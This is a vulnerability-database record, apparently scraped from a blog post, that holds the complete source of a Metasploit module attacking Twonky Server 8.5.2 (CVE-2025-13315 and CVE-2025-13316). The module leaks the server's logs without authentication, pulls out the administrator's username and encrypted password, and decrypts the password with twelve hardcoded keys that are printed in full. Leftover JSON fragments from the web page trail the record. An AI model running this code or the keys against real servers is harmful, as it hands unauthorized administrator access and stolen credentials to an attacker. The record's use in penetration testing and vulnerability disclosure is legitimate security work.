{“lastseen”:”2025-11-28T19:04:44″,”description”:”This module leverages an authentication bypass in Twonky Server 8.5.2. By exploiting an authorization flaw to access a privileged web API endpoint and leak application logs, encrypted administrator credentials are leaked CVE-2025-13315. The exploit…”,”published”:”2025-11-28T18:56:59″,”modified”:”2025-11-28T18:56:59″,”type”:”metasploit”,”title”:”Twonky Server Log Leak Authentication Bypass”,”source”:””,”references”:””,”id”:”MSF:AUXILIARY-GATHER-TWONKY_AUTHBYPASS_LOGLEAK-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-13315″,”CVE-2025-13316″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Auxiliary\\n include Msf::Exploit::Remote::HttpClient\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Twonky Server Log Leak Authentication Bypass’,\\n ‘Description’ =\\u003e %q{\\n This module leverages an authentication bypass in Twonky Server 8.5.2. By exploiting\\n an authorization flaw to access a privileged web API endpoint and leak application logs,\\n encrypted administrator credentials are leaked (CVE-2025-13315). The exploit will then decrypt\\n these credentials using hardcoded keys (CVE-2025-13316) and login as the administrator.\\n Expected module output is a username and plain text password for the administrator account.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘remmons-r7’ # Initial discovery, MSF module\\n ],\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2025-13315’],\\n [‘CVE’, ‘2025-13316’],\\n [‘URL’, ‘https:\/\/www.rapid7.com\/blog\/post\/cve-2025-13315-cve-2025-13316-critical-twonky-server-authentication-bypass-not-fixed\/’]\\n ],\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n # No IoCs, in logs or individual files, are known\\n # If a non-default reverse proxy is configured in front of Twonky Server, it may log web traffic\\n ‘SideEffects’ =\\u003e [],\\n ‘Reliability’ =\\u003e []\\n }\\n )\\n )\\n\\n register_options(\\n [\\n Opt::RPORT(9000),\\n OptString.new(‘TARGETURI’, [true, ‘The URI path to Twonky Server’, ‘\/’])\\n ]\\n )\\n end\\n\\n def run\\n # Unauthenticated requests to the ‘\/dev0\/desc.xml’ endpoint should return the version number\\n print_status(‘Confirming the target is vulnerable’)\\n res = send_request_cgi(\\n {\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘dev0’, ‘desc.xml’)\\n }\\n )\\n\\n fail_with(Failure::Unknown, ‘Connection failed – unable to get XML web response’) unless res\\n\\n # Confirm that the response contains the expected 8.5.2 XML string\\n if (res\\u0026.code != 200) || (!res.body.include? ‘\\u003cmodelNumber\\u003e8.5.2\\u003c\/modelNumber\\u003e’)\\n fail_with(Failure::NotVulnerable, ‘The target does not appear to be a Twonky Server instance running version 8.5.2’)\\n end\\n\\n print_good(‘The target is Twonky Server v8.5.2’)\\n\\n print_status(‘Attempting to leak the administrator username and encrypted password’)\\n res = send_request_cgi(\\n {\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘nmc’, ‘rpc’, ‘log_getfile’)\\n }\\n )\\n\\n fail_with(Failure::Unknown, ‘Connection failed – unable to get log API response’) unless res\\n\\n # Grab the most recent (last) administrator username value from the logs\\n pattern = \/ accessuser\\\\s*=\\\\s*(\\\\S+)\/\\n result = res.body.scan(pattern).last\\n\\n # If the log has been cleared since startup or the server hasn’t restarted since setup\\n fail_with(Failure::NotFound, ‘The target did not return a log file containing a username value’) unless result\\n\\n username = result[0]\\n\\n print_good(\\”The target returned the administrator username: #{username}\\”)\\n\\n # Grab the most recent (last) password value from the logs to decrypt\\n # \\”||\\” + hex number (key index) + hex Blowfish ECB ciphertext\\n pattern = \/\\\\|\\\\|([0-9A-F]){1}([a-fA-F0-9]+)\/\\n result = res.body.scan(pattern).last\\n\\n # If the log has been cleared since the last password change or the server hasn’t restarted since setup\\n fail_with(Failure::NotFound, ‘The target did not return a log file containing a password value’) unless result\\n\\n # Extract the encryption key index as base16\\n enc_key_index = result[0]\\n\\n # Handle possible match array containing more than minimum 16 chars (longer encrypted password)\\n if !result[2].nil?\\n enc_pwd = result[1] + result[2..].join\\n else\\n enc_pwd = result[1]\\n end\\n\\n print_good(\\”The target returned the encrypted password and key index: #{enc_pwd}, #{enc_key_index}\\”)\\n\\n # Decrypt the admin password using static key\\n password = decrypt_password(enc_pwd, enc_key_index)\\n\\n print_good(\\”Credentials decrypted: USER=#{username} PASS=#{password}\\”)\\n\\n report_vuln(\\n host: rhost,\\n name: name,\\n refs: references\\n )\\n\\n store_loot(‘Twonky Server Credentials’, ‘text\/plain’, datastore[‘RHOST’], \\”Username: \\\\\\”#{username}\\\\\\” Password: \\\\\\”#{password}\\\\\\”\\”)\\n end\\n\\n # Decrypt the password using Blowfish ECB with the specified encryption key\\n def decrypt_password(pwd, key_num)\\n # Twonky Server 8.5.2 uses static encryption keys for passwords\\n static_keys = [\\n ‘E8ctd4jZwMbaV587’,\\n ‘TGFWfWuW3cw28trN’,\\n ‘pgqYY2g9atVpTzjY’,\\n ‘KX7q4gmQvWtA8878’,\\n ‘VJjh7ujyT8R5bR39’,\\n ‘ZMWkaLp9bKyV6tXv’,\\n ‘KMLvvq6my7uKkpxf’,\\n ‘jwEkNvuwYCjsDzf5’,\\n ‘FukE5DhdsbCjuKay’,\\n ‘SpKNj6qYQGjuGMdd’,\\n ‘qLyXuAHPTF2cPGWj’,\\n ‘rKz7NBhM3vYg85mg’\\n ]\\n\\n # Encrypted password hex to bytes\\n pwd_bytes = [pwd].pack(‘H*’)\\n\\n # Select the appropriate key, based on the index hex number stored with the ciphertext\\n key = static_keys[key_num.to_i(16)]\\n\\n print_status(\\”Decrypting password using key: #{key}\\”)\\n\\n cipher = OpenSSL::Cipher.new(‘bf-ecb’).decrypt\\n cipher.key_len = key.length\\n cipher.padding = 0\\n cipher.key = key\\n cipher.update(pwd_bytes) + cipher.final\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/auxiliary\/gather\/twonky_authbypass_logleak.rb”,”cvss”:{“score”:9.3,”severity”:”CRITICAL”,”vector”:”CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:H\/SC:N\/VI:H\/SI:N\/VA:H\/SA:N”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/gather\/twonky_authbypass_logleak\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-11-28T19:04:44″,”description”:”This module leverages an authentication bypass in Twonky Server 8.5.2. By exploiting an authorization flaw to access a privileged web API endpoint and leak application…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,55,12,169,13,7,11,5],"class_list":["post-27947","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-93","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n